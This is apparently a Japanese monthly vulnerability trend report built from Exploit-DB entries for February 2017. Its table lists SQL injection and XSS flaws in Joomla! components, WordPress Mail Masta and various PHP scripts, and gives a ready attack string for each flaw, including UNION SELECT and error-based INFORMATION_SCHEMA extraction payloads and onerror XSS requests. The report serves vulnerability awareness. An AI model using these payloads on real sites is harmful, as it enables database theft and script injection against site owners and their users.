Injection 脆弱性
/buyleads-details.php?id=') UNION ALL SELECT
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e
58566e66484f74555968674d504262564348434b70657a4c4
5556b534e,0x716a626271)#
Itech B2B
Script
Itech B2B
Script 4.29
2017-02-12 41359 XSS 易 中Itech B2B Script 4.29 -
/sendMessage.php XSS 脆弱性
POST /ajax-file/sendMessage.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
msg_message=<img src=i onerror=prompt(1)>
Itech B2B
Script
Itech B2B
Script 4.29
2017-02-12 41359 XSS 易 中Itech B2B Script 4.29 - my-
contactdetails.php XSS 脆弱性
POST /my-contactdetails.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
fname=<img src=i onerror=prompt(1)>
Itech B2B
Script
Itech B2B
Script 4.29
2017-02-12 41319 SQL Injection 易 中
Domains & Hostings Manager
PRO 3.0 - edit.php SQL Injection
脆弱性
/edit.php?entries=1%20and%201=1--
Domains &
Hostings
Manager PRO
Domains &
Hostings
Manager PRO
3.0
2017-02-12 41318 SQL Injection 易 中
Quadz School Management
System 3.1 -
/index.php/suggestion/ SQL
Injection 脆弱性 #
/index.php/suggestion/own_suggestion?uisd=1%20and%20
1=1--
Quadz School
Management
System
Quadz School
Management
System 3.1
2017-02-12 41315 SQL Injection 易 中Viavi Real Estate -
buysalerent.php SQL Injection/buysalerent.php?sort=1%20and%201=1-- Viavi
Viavi Real
Estate
2017-02-12 41314 SQL Injection 易 中
TI Online Examination System
2.0 - student_edit.php SQL
Injection 脆弱性
/center/student_edit.php?s_id=1%20and%201=1--
TI Online
Examination
System
TI Online
Examination
System 2.0
2017-02-12 41314 SQL Injection 易 中
TI Online Examination System
2.0 - edit_notice.php SQL
Injection 脆弱性
/center/edit_notice.php?n_id=1%20and%201=1--
TI Online
Examination
System
TI Online
Examination
System 2.0
2017-02-12 41328 SQL Injection 易 中
Joomla! Component Soccer Bet
4.1.5 - index.php SQL Injection
脆弱性
/index.php?option=com_soccerbet&view=userbethistory&u
serid=1%20and%201=1--Joomla
Joomla!
Component
Soccer Bet
4.1.5
2017-02-12 41313 SQL Injection 易 中
WhizBiz 1.9 -
/index.php/en/results/ SQL
Injection 脆弱性
/index.php/en/results/plainkey=1%20and%201=1-- WhizBiz WhizBiz 1.9
2017-02-12 41314 SQL Injection 易 中
TI Online Examination System
2.0 - exam_edit.php SQL
Injection 脆弱性
/center/exam_edit.php?p_e_id=1%20and%201=1--
TI Online
Examination
System
TI Online
Examination
System 2.0
2017-02-12 41315 SQL Injection 易 中Viavi Real Estate - property-
detail.php SQL Injection 脆弱性/property-detail.php?pid=1%20and%201=1-- Viavi
Viavi Real
Estate
2017-02-12 41316 SQL Injection 易 中Viavi Movie Review - 'id'
Parameter SQL Injection/genres.php?id=1%20and%201=1-- Viavi
Viavi Movie
Review
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-12 41317 SQL Injection 易 中
Viavi Product Review -
category.php SQL Injection 脆弱
性
/category.php?id=1%20and%201=1-- ViaviViavi Product
Review
2017-02-12 41318 SQL Injection 易 中
Quadz School Management
System 3.1 - /index.php/sclass/
SQL Injection 脆弱性
/index.php/sclass/ownClassRoutin?uisd=1%20and%201=1--
Quadz School
Management
System
Quadz School
Management
System 3.1
2017-02-12 41319 SQL Injection 易 中
Domains & Hostings Manager
PRO 3.0 - list.php SQL Injection
脆弱性
/list.php?entries=1%20and%201=1--
Domains &
Hostings
Manager PRO
Domains &
Hostings
Manager PRO
3.0
2017-02-13 41347 SQL Injection 易 中
Joomla! Component JE
Messanger - index.php SQL
Injection 脆弱性
/index.php?option=com_jemessenger&view=box_detail&fol
der=Inbox&task=edit&Itemid=1496&cid[0]=1%20and%201
=1--
Joomla
Joomla!
Component JE
Messanger
2017-02-13 41346 SQL Injection 易 中
Joomla! Component JE Ticket
System 1.2 - index.php SQL
Injection 脆弱性
/index.php?option=com_jeticket&view=assign_detail&cid[0]
=1%20and%201=1--Joomla
Joomla!
Component JE
Ticket System
1.2
2017-02-13 41345 SQL Injection 易 中
Joomla! Component JE Portfolio
Creator 1.2 - index.php SQL
Injection 脆弱性
/index.php?option=com_jeportfolio&view=item_detail&d_it
emid=1%20and%201=1--Joomla
Joomla!
Component JE
Portfolio
Creator 1.2
2017-02-13 41344 SQL Injection 易 中
Joomla! Component JE Form
Creator 1.8 - index.php SQL
Injection 脆弱性
/index.php?option=com_jeformcr&view=form&Itemid=1%2
0and%201=1--Joomla
Joomla!
Component JE
Form Creator
1.8
2017-02-13 41343 SQL Injection 易 中
Joomla! Component JE K2
Multiple Form Story 1.3 -
index.php SQL Injection 脆弱性
/index.php?option=com_jek2storymultipleform&view=jesub
mit&Itemid=1%20and%201=1--Joomla
Joomla!
Component JE
K2 Multiple
Form Story 1.3
2017-02-13 41342 SQL Injection 易 中
Joomla! Component JE Grid
Folio - index.php SQL Injection
脆弱性
/index.php?option=com_jegridfolio&view=category_detail&
id=1%20and%201=1--Joomla
Joomla!
Component JE
Grid Folio
2017-02-13 41341 SQL Injection 易 中
Joomla! Component JE Quiz 2.3
- index.php SQL Injection 脆弱
性
/index.php?option=com_jequizmanagement&view=questio
n&eid=1%20and%201=1--Joomla
Joomla!
Component JE
Quiz 2.3
2017-02-13 41340 SQL Injection 易 中
Joomla! Component Hbooking
1.9.9 - index.php SQL Injection
脆弱性
/index.php?option=com_hbooking&view=roomlisting&tem
p=hotel&h_id=1%20and%201=1--Joomla
Joomla!
Component
Hbooking
1.9.9
2017-02-13 41339 SQL Injection 易 中
Joomla! Component JE Awd
Song 1.8 - /index.php SQL
Injection 脆弱性
/index.php?option=com_jeawdsong&view=song_detail&id=
1%20and%201=1--Joomla
Joomla!
Component JE
Awd Song 1.8
2017-02-13 41338 SQL Injection 易 中
Joomla! Component JE Auto 1.5
- index.php SQL Injection 脆弱
性
/index.php?option=com_jeauto&view=item_detail&d_itemi
d=1%20and%201=1--Joomla
Joomla!
Component JE
Auto 1.5
2017-02-13 41337 SQL Injection 易 中
Joomla! Component JE auction
1.6 - index.php SQL Injection 脆
弱性
/index.php?option=com_jeauction&view=event_detail&eid
=1%20and%201=1--Joomla
Joomla!
Component JE
auction 1.6
2017-02-13 41336 SQL Injection 易 中
Joomla! Component JE Video
Rate 1.0 - index.php SQL
Injection 脆弱性
/index.php?option=com_jevideorate&view=video&cat_id=1
%20and%201=1--Joomla
Joomla!
Component JE
Video Rate 1.0
2017-02-13 41335 SQL Injection 易 中
Joomla! Component JE Tour 2.0
- index.php SQL Injection 脆弱
性
/index.php?option=com_jetour&view=package_detail&pid=
1%20and%201=1--Joomla
Joomla!
Component JE
Tour 2.0
2017-02-13 41334 SQL Injection 易 中
Joomla! Component JE Property
Finder 1.6.3 - index.php SQL
Injection 脆弱性
/index.php?option=com_jepropertyfinder&view=section_de
tail&sf_id=1%20and%201=1--Joomla
Joomla!
Component JE
Property
Finder 1.6.3
2017-02-13 41333 SQL Injection 易 中
Joomla! Component JE
QuoteForm - index.php SQL
Injection 脆弱性
/index.php?option=com_jequoteform&view=form&Itemid=
1%20and%201=1--Joomla
Joomla!
Component JE
QuoteForm
2017-02-13 41332 SQL Injection 易 中
Joomla! Component JE Directory
1.7 - index.php SQL Injection 脆
弱性
/index.php?option=com_jedirectory&view=item_detail&dite
mid=1%20and%201=1--Joomla
Joomla!
Component JE
Directory 1.7
2017-02-13 41331 SQL Injection 易 中
Joomla! Component JE Gallery
1.3 - index.php SQL Injection 脆
弱性
/index.php?option=com_jegallery&view=photo_detail&phot
o_id=1%20and%201=1--Joomla
Joomla!
Component JE
Gallery 1.3
2017-02-13 41330 SQL Injection 易 中
Joomla! Component JE Classify
Ads 1.2 - index.php SQL
Injection 脆弱性
/index.php?option=com_jeclassifyads&view=item_detail&pr
o_id=1%20and%201=1--Joomla
Joomla!
Component JE
Classify Ads
1.2
2017-02-13 41329 SQL Injection 難 高PHP Marketplace Script -
/shopby/ SQL Injection 脆弱性
/shopby/all?q=LIEQ") AND (SELECT 7200 FROM(SELECT
COUNT(*),CONCAT(0x7170767871,(SELECT
(ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
AND ("SRxl"="SRxl
PHP
Marketplace
Script
PHP
Marketplace
Script
2017-02-15 41362 SQL Injection 易 中Joomla! Component JoomBlog
1.3.1 - SQL Injection
/index.php?option=com_joomblog&task=tag&tag=Ihsan_S
encan%27%20and%201=1--Joomla
Joomla!
Component
JoomBlog
1.3.1
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-15 41368 SQL Injection 易 中
Joomla! Component JSP Store
Locator 2.2 - 'id' Parameter SQL
Injection
/index.php?option=com_jsplocation&task=directionview&id
=1%20and%201=1--Joomla
Joomla!
Component
JSP Store
Locator 2.2
2017-02-16 41378 SQL Injection 易 中
Joomla! Component JEmbedAll
1.4 - index.php SQL Injection 脆
弱性
/index.php?option=com_jembedall&downloadfree=1%20an
d%201=1--Joomla
Joomla!
Component
JEmbedAll 1.4
2017-02-16 41371 SQL Injection 易 中
Joomla! Component Spider
Calendar Lite 3.2.16 - SQL
Injection
/index.php?option=com_spidercalendar&view=spidercalend
ar&calendar_id=1%20and%201=1--Joomla
Joomla!
Component
Spider
Calendar Lite
3.2.16
2017-02-16 41372 SQL Injection 易 中
Joomla! Component Spider
Catalog Lite 1.8.10 - index.php
SQL Injection 脆弱性
/index.php?option=com_spidercatalog&product_id=40&vie
w=showproduct&page_num=1&back=1&show_category_d
etails=0&display_type=list&show_subcategories=0&show_s
ubcategories_products=0&show_products=1&select_categ
ories=0&Itemid=1%20and%201=1--
Joomla
Joomla!
Component
Spider Catalog
Lite 1.8.10
2017-02-16 41373 SQL Injection 易 中Joomla! Component Spider
Facebook 1.6.1 - SQL Injection
/index.php?option=com_spiderfacebook&task=loginwith&n
ame=1%20and%201=1--Joomla
Joomla!
Component
Spider
1.6.1
2017-02-16 41374 SQL Injection 易 中Joomla! Component Spider FAQ
Lite 1.3.1 - SQL Injection
/index.php?option=com_spiderfaq&view=spiderfaqmultiple
&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&sear
chform=1&expand=0&Itemid=1%20and%201=1--Joomla
Joomla!
Component
Spider FAQ
Lite 1.3.1
2017-02-16 41377 SQL Injection 中 中dotCMS 3.6.1 - / SQL Injection
脆弱性
/categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SEL
ECT(SUBSTRING((SELECT(${column})FROM(${database}.user_
)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+
${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23
dotCMS dotCMS 3.6.1
2017-02-17 41382 SQL Injection 易 中
Joomla! Component WMT
Content Timeline 1.0 -
index.php SQL Injection 脆弱性
/index.php?option=com_wmt_content_timeline&task=retur
nArticle&id=66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,
9,10,0x496873616e2053656e63616e203c62723e207777772
e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+c
ount(*)from(information_schema.columns)where@:=export_
set(5,export_set(5,@,table_name,0x3c6c693e,2),column_nam
e,0xa3a,2)),@,2)),13,14,15--+-
Joomla
Joomla!
Component
WMT Content
Timeline 1.0
2017-02-17 41380 SQL Injection 易 中
Joomla! Component Groovy
Gallery 1.0.0 - index.php SQL
Injection 脆弱性
/index.php?option=com_groovygallery&view=images&filter
_category=1%20and%201=1--Joomla
Joomla!
Component
Groovy Gallery
1.0.0
2017-02-17 41379 SQL Injection 易 中
Joomla! Component Team
Display 1.2.1 - index.php SQL
Injection 脆弱性
/index.php?option=com_teamdisplay&view=members&filte
r_category=1%20and%201=1--Joomla
Joomla!
Component
Team Display
1.2.1
2017-02-18 41438 SQL Injection 易 中
WordPress Plugin Mail Masta
1.0 - csvexport.php SQL
Injection 脆弱性
/wp-content/plugins/mail-
masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/va
r/www/html/wordpress/wp-load.phpWordPress
WordPress
Plugin Mail
Masta 1.0
2017-02-18 41438 SQL Injection 易 中
WordPress Plugin Mail Masta
1.0 - admin.php SQL Injection
脆弱性
/wp-admin/admin.php?page=masta-
lists&action=view_list&filter_list=0+OR+1%3D1WordPress
WordPress
Plugin Mail
Masta 1.0
2017-02-18 41438 SQL Injection 易 中
WordPress Plugin Mail Masta
1.0 - admin-ajax.php SQL
Injection 脆弱性
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-
content%2Fplugins%2Fmail-
masta%2Finc%2Fcampaign_save.php&sender_selected_list_c
heck=check&list_id=1+OR+1%3D1
WordPress
WordPress
Plugin Mail
Masta 1.0
2017-02-18 41393 SQL Injection 易 中
Joomla! Component Most
Wanted Real Estate 1.1.0 - /
SQL Injection 脆弱性
/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1mi
nprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1mi
nbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1m
axarea=&filter_a1minland=&filter_a1maxland=&filter_a1lan
dtype=0&which_order=1%20and%201=1--
Joomla
Joomla!
Component
Most Wanted
Real Estate
1.1.0
2017-02-18 41391 SQL Injection 難 高
Joomla! Component Google
Map Store Locator 4.4 - / SQL
Injection 脆弱性
/?filter_to=a&filter_day=21-02-
2017&filter_time=+/*!50000Procedure*/+/*!50000Analyse*/
+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053
656e63616e,0x3a,@@version)),0)-- -
Joomla
Joomla!
Component
Google Map
Store Locator
4.4
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-18 41390 SQL Injection 難 高
Joomla! Component Bazaar
Platform 3.0 - index.php SQL
Injection 脆弱性
/index.php?option=com_bazaar&view=productsearch&sear
chproduct=a&category=1+/*!50000Procedure*/+/*!50000A
nalyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x49687361
6e2053656e63616e,0x3a,@@version)),0)-- -
Joomla
Joomla!
Component
Bazaar
Platform 3.0
2017-02-18 41389 SQL Injection 難 高
Joomla! Component Room
Management 1.0 - /room/ SQL
Injection 脆弱性
/room/book?tmpl=component&id=5&date='+/*!50000Pro
cedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat
*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0
)-- -
Joomla
Joomla!
Component
Room
Management
1.0
2017-02-18 41388 SQL Injection 易 中
Joomla! Component OS Services
Booking 2.5.1 - index.php SQL
Injection 脆弱性
/index.php?option=com_osservicesbooking&task=default_s
howmap&vid=1%20and%201=1--Joomla
Joomla!
Component
OS Services
Booking 2.5.1
2017-02-18 41387 SQL Injection 易 中
Joomla! Component EShop 2.5.1
- index.php SQL Injection 脆弱
性
/index.php?option=com_eshop&view=category&id=1%20a
nd%201=1--Joomla
Joomla!
Component
EShop 2.5.1
2017-02-18 41386 SQL Injection 易 中
Joomla! Component OS
Property 3.0.8 - index.php SQL
Injection 脆弱性
/index.php?option=com_osproperty&view=ltype&catIds[0]
=1%20and%201=1--Joomla
Joomla!
Component
OS Property
3.0.8
2017-02-18 41383 SQL Injection 易 中
Joomla! Component Joomloc-
CAT 4.1.3 - index.php SQL
Injection 脆弱性
/index.php?option=com_joomloc&view=engine&layout=ge
o&liste=65&place=dep&ville=1%20and%201=1--Joomla
Joomla!
Component
Joomloc-CAT
4.1.3
2017-02-18 41384 SQL Injection 易 中
Joomla! Component Joomloc-
Lite 1.3.2 - index.php SQL
Injection 脆弱性
/index.php?option=com_joomloc&view=loc&layout=singlel
oc&site_id=1%20and%201=1--Joomla
Joomla!
Component
Joomloc-Lite
1.3.2
2017-02-18 41385 SQL Injection 易 中
Joomla! Component JomWALL
4.0 - 'wuid' Parameter SQL
Injection
/index.php?option=com_awdwall&task=gethovercard&wuid
=1%20and%201=1--Joomla
Joomla!
Component
JomWALL 4.0
2017-02-20 41399 SQL Injection 易 中
Joomla! Component MaQma
Helpdesk 4.2.7 - index.php SQL
Injection 脆弱性
/index.php?option=com_maqmahelpdesk&task=pdf_kb&id
=1%20and%201=1--Joomla
Joomla!
Component
MaQma
Helpdesk 4.2.7
2017-02-20 41400 SQL Injection 易 中
Joomla! Component PayPal IPN
for DOCman 3.1 - index.php
SQL Injection
/index.php?option=com_docmanpaypal&task=addToCart&i
d=1%20and%201=1--Joomla
Joomla!
Component
PayPal IPN for
DOCman 3.1
2017-02-21 41412 SQL Injection 易 中
Joomla! Component
AppointmentBookingPro 4.0.1 -
index.php SQL Injection 脆弱性
/index.php?option=com_rsappt_pro3&view=resourceslist&t
ags=1%20and%201=1--Joomla
Joomla!
Component
AppointmentB
ookingPro
4.0.1
2017-02-21 41405 SQL Injection 易 中
Joomla! Component J-
HotelPortal 6.0.2 - 'review_id'
Parameter SQL Injection
/index.php?option=com_jhotelreservation&tmpl=compone
nt&task=hotelratings.printRating&view=hotelratings&revie
w_id=1%20and%201=1--
Joomla
Joomla!
Component J-
HotelPortal
6.0.2
2017-02-21 41406 SQL Injection 易 中
Joomla! Component J-
CruiseReservation Standard 3.0 -
'city' Parameter SQL Injection
/cruises/cruises?city=1%20and%201=1-- Joomla
Joomla!
Component J-
CruiseReservat
ion Standard
3.0
2017-02-21 41407 SQL Injection 易 中
Joomla! Component Eventix
Events Calendar 1.0 - SQL
Injection
/index.php?option=com_eventix&view=eventsday&selected
_date=2017-02-16&day=1%20and%201=1--Joomla
Joomla!
Component
Eventix Events
Calendar 1.0
2017-02-21 41408 SQL Injection 易 中
Joomla! Component J-
MultipleHotelReservation
Standard 6.0.2 - index.php SQL
Injection 脆弱性
/index.php?option=com_jhotelreservation&tmpl=compone
nt&task=hotelratings.printRating&view=hotelratings&revie
w_id=1%20and%201=1--
Joomla
Joomla!
Component J-
MultipleHotelR
eservation
Standard 6.0.2
2017-02-21 41409 SQL Injection 易 中
Joomla! Component Directorix
Directory Manager 1.1.1 -
index.php SQL Injection 脆弱性
/index.php?option=com_directorix&view=entriessearch&se
arch_categories[]=1%20and%201=1--Joomla
Joomla!
Component
Directorix
Directory
Manager 1.1.1
2017-02-21 41410 SQL Injection 易 中
Joomla! Component Magic
Deals Web 1.2.0 - index.php
SQL Injection 脆弱性
/index.php?filterbycats=all&fullordering=1%20and%201=1-
-
&option=com_magicdealsweb&task=dealswebindex&view
=dealswebindex
Joomla
Joomla!
Component
Magic Deals
Web 1.2.0
2017-02-21 41411 SQL Injection 易 中
Joomla! Component J-
BusinessDirectory 4.6.8 - SQL
Injection
/index.php?option=com_jbusinessdirectory&view=compani
es&companyId=1%20and%201=1--Joomla
Joomla!
Component J-
BusinessDirect
ory 4.6.8
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-21 41412 SQL Injection 易 中
Joomla! Component
AppointmentBookingPro 4.0.1 -
SQL Injection 脆弱性
/component/rsappt_pro3/booking_screen_gad/891/show_c
onfirmation/ff09f352c87f96e505706df0cfa3e8cc/999%27%2
0and%201=1--
Joomla
Joomla!
Component
AppointmentB
ookingPro
4.0.1
2017-02-22 41431 SQL Injection 易 中
Joomla! Component
MediaLibrary Basic 3.5 -
index.php SQL Injection 脆弱性
(2)
/index.php/medialibrary/media/all-books/all-
books/345/lend_request?mid[0]=1%20and%201=1--Joomla
Joomla!
Component
MediaLibrary
Basic 3.5
2017-02-22 41427 SQL Injection 易 中
Joomla! Component
ContentMap 1.3.8 - 'contentid'
Parameter SQL Injection
/index.php?option=com_contentmap&owner=plugin&view
=smartloader&id=10135&Itemid=606&type=json&filenam
e=articlesmarkers&source=article&contentid=1%20and%2
01=1--
Joomla
Joomla!
Component
ContentMap
1.3.8
2017-02-22 41428 SQL Injection 易 中
Joomla! Component
VehicleManager 3.9 - SQL
Injection
/index.php?option=com_vehiclemanager&Itemid=70&task
=search&submit=Search&catid=0&maker=&fuel_type=all
&model=all&listing_type=all&transmission=all&vcondition
=1%20and%201=1--
Joomla
Joomla!
Component
VehicleManag
er 3.9
2017-02-22 41429 SQL Injection 易 中
Joomla! Component
RealEstateManager 3.9 - SQL
Injection
/index.php/realestate/all-houses/all-houses-
default/160/search?searchtext=a&catid=all&search_date_fr
om=2017-02-21&search_date_until=2017-02-
28&pricefrom2=114019&priceto2=750000&listing_type=all
&listing_status=1%20and%201=1--
Joomla
Joomla!
Component
RealEstateMan
ager 3.9
2017-02-22 41430 SQL Injection 易 中
Joomla! Component BookLibrary
3.6.1 - index.php SQL Injection
脆弱性
/index.php?option=com_booklibrary&task=suggestion&co
mment=1%20and%201=1-- Joomla
Joomla!
Component
BookLibrary
3.6.1
2017-02-22 41431 SQL Injection 易 中
Joomla! Component
MediaLibrary Basic 3.5 -
index.php SQL Injection 脆弱性
/index.php/medialibrary/media/all-books/all-
books/345/view/book/19%27%20and%201=1--
/Ihsan_Sencan
Joomla
Joomla!
Component
MediaLibrary
Basic 3.5
2017-02-23 41440 SQL Injection 易 中Joomla! Component Store for
K2 3.8.2 - SQL Injection
/index.php?option=com_k2store&view=checkout&task=get
Country&=1%20and%201=1--Joomla
Joomla!
Component
Store for K2
3.8.2
2017-02-23 41441 SQL Injection 中 中
Joomla! Component
UserExtranet 1.3.1 - index.php
SQL Injection 脆弱性
/index.php?option=com_userextranet&view=folders&fid=6
6+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,
/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a
,@@version)),0)-- -
Joomla
Joomla!
Component
UserExtranet
1.3.1
2017-02-23 41442 SQL Injection 中 中
Joomla! Component MultiTier
3.1 - index.php SQL Injection 脆
弱性
/index.php/component/multitier/?mtpage=takecodel&tid=
1&lid=66'+/*!50000union*/+select+1,0x496873616e20536
56e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)f
rom(information_schema.columns)where@:=export_set(5,ex
port_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a
,2)),@,2)),7,8+-- -
Joomla
Joomla!
Component
MultiTier 3.1
2017-02-24 41450 SQL Injection 中 中Joomla! Component GPS Tools
4.0.1 - SQL Injection
/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_k
eywords=1&filter_order=a.catid&filter_order_Dir=desc&cati
d[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((
SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x4968736
16e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+C
HAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMA
TA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FRO
M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(R
AND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GRO
UP+BY+x)a)+AND+1=1
Joomla
Joomla!
Component
GPS Tools
4.0.1
2017-02-24 41452 SQL Injection 難 高
Joomla! Component Community
Quiz 4.3.5 - / SQL Injection 脆弱
性
/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_key
words=1&filter_order=a.created&filter_order_Dir=asc&catid
[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((S
ELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x49687361
6e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CH
AR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMAT
A+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FRO
M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(R
AND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GRO
UP+BY+x)a)+AND+1=1&view=quizzes
Joomla
Joomla!
Component
Community
Quiz 4.3.5
2017-02-24 41444 SQL Injection 易 中
Joomla! Component
JooDatabase 3.1.0 - index.php
SQL Injection 脆弱性
/index.php?option=com_joodb&view=catalog&format=htm
l&reset=false&Itemid=321&task=&search=1%20and%201
=1--&searchfield=Ihsan_SencanJoomla
Joomla!
Component
JooDatabase
3.1.0
2017-02-24 41445 SQL Injection 易 中
Joomla! Component JO
Facebook Gallery 4.5 -
index.php SQL Injection 脆弱性
/index.php?option=com_jofacebookgallery&view=category
&id=1%20and%201=1--Joomla
Joomla!
Component
JO Facebook
Gallery 4.5
日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境
2017.02.01~2017.02.28 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
EDB-Report最新Web脆弱性トレンドレポート(2017.02)
2017-02-24 41446 SQL Injection 易 中
Joomla! Component AJAX
Search for K2 2.2 - / SQL
Injection 脆弱性
/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=
1%20and%201=1--Joomla
Joomla!
Component
AJAX Search
for K2 2.2
2017-02-24 41447 SQL Injection 難 高
Joomla! Component Community
Surveys 4.3 - / SQL Injection 脆
弱性
/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_k
eywords=1&filter_order=a.catid&filter_order_Dir=desc&cati
d[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((
SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x4968736
16e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+C
HAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMA
TA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FRO
M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(R
AND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GRO
UP+BY+x)a)+AND+1=1
Joomla
Joomla!
Component
Community
Surveys 4.3
2017-02-24 41448 SQL Injection 難 高Joomla! Component Community
Polls 4.5.0 - SQL Injection
/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_k
eywords=1&filter_order=a.catid&filter_order_Dir=desc&cati
d[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((
SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x4968736
16e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+C
HAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMA
TA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FRO
M+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(R
AND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GRO
UP+BY+x)a)+AND+1=1
Joomla
Joomla!
Component
Community
Polls 4.5.0
2017-02-25 41456 SQL Injection 易 中
Joomla! Component Intranet
Attendance Track 2.6.5 -
index.php SQL Injection 脆弱性
/index.php?option=com_intranet&view=calendar&month=
3&year=1%20and%201=1--Joomla
Joomla!
Component
Intranet
Attendance
Track 2.6.5
2017-02-25 41460 SQL Injection 易 中
Joomla! Component Gnosis
1.1.2 - index.php SQL Injection
脆弱性
/index.php?option=com_gnosis&view=tags&id=1%20and%
201=1--Joomla
Joomla!
Component
Gnosis 1.1.2
2017-02-25 41462 SQL Injection 易 中
Joomla! Component
Appointments for JomSocial
3.8.1 - /my-appointments/ SQL
Injection 脆弱性
/my-appointments/viewappointment?id=1%20and%201=1-
-Joomla
Joomla!
Component
Appointments
for JomSocial
3.8.1
2017-02-25 41465 SQL Injection 易 中Joomla! Component JomSocial -
/groups/ SQL Injection 脆弱性/groups/?IhsanSencan=1%20and%201=1-- Joomla
Joomla!
Component
JomSocial
2017-02-25 41465 SQL Injection 易 中Joomla! Component JomSocial -
/videos/ SQL Injection 脆弱性/videos/?IhsanSencan=1%20and%201=1-- Joomla
Joomla!
Component
JomSocial
2017-02-25 41465 SQL Injection 易 中Joomla! Component JomSocial -
/events/ SQL Injection 脆弱性/events/?IhsanSencan=1%20and%201=1-- Joomla
Joomla!
Component
JomSocial
2017-02-25 41464 SQL Injection 易 中Joomla! Component Spinner
360 1.3. - / SQL Injection 脆弱性/spinner-360?Ihsan_Sencan=1%20and%201=1-- Joomla
Joomla!
Component
Spinner 360
1.3.0
2017-02-25 41463 SQL Injection 易 中
Joomla! Component My MSG
3.2.1 - index.php SQL Injection
脆弱性
/index.php?option=com_mymsg&layout=edit&reply_id=1%
20and%201=1--Joomla
